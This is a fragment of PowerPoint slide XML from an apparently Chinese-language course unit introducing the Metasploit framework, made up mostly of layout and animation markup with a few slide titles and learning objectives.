                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="58" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="7600"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="59" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105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21" grpId="1"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="3" grpId="1"/>
      <p:bldP spid="10" grpId="0"/>
      <p:bldP spid="10" grpId="1"/>
      <p:bldP spid="11" grpId="0"/>
      <p:bldP spid="11" grpId="1"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide1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a:xfrm>
            <a:off x="5590261" y="1695539"/>
            <a:ext cx="5567680" cy="1552575"/>
            <a:chOff x="6627851" y="1871939"/>
            <a:chExt cx="5567680" cy="1552575"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="2086569"/>
              <a:ext cx="4902200" cy="1337945"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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150000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>      </a:t>
              </a:r>
              <a:r>
                <a:rPr dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>了解 Metasploit工具的功能模块、框架结构、文件结构和启动方式等内容，为后续学习Metasploit工具作好准备。</a:t>
              </a:r>
              <a:endParaRPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实例】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22" descr="D:\用户目录\Desktop\政治审核\PPT用图\Render2.jpgRender2"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="361315" y="2200275"/>
            <a:ext cx="4585335" cy="3115945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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13" name="矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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14" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5081905" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.1 认识Metasploit</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>了解 Metasploit框架结构</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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19" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5081905" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.1 认识Metasploit</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="文本框 110"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5758180" y="837882"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Metasploit框架结构如图2-4-1所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="图片 19"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
